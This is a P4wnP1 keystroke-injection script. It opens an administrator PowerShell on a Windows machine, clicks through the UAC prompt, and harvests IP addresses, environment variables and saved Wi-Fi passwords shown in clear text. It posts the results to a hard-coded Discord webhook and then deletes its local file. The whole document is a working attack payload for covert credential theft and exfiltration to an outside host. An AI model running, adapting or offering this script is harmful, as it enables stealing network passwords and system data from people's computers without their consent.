layout("US");
press("gui");
delay(500);
type("powershell");
delay(500);
press("ctrl shift enter");
delay(1000);
press("alt y");
delay(2000);
press("enter");
delay(500);
type("Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\\d+.\\d+)' >> target.txt;$url=\"https://discordapp.com/api/webhooks/1080051025437798500/vWacPmGZLEDCyler5q8iHxWBHwxiqJpqzfq8XLdBeR8ErIV98A6Lq4bK4OKPR_Cgay0F\";dir env: >> target.txt;(netsh wlan show profiles) | Select-String \"\\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=\"$name\" key=clear)}  | Select-String \"Key Content\\W+\\:(.+)$\" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> stats.txt;$Body=@{ content = \"$env:computername Stats from P4wnP1\"};Invoke-RestMethod -ContentType 'Application/Json' -Uri $url  -Method Post -Body ($Body | ConvertTo-Json);curl.exe -F \"file1=@target.txt\" $url ; Remove-Item '.\\target.txt'; exit");
press("enter");
delay(500);
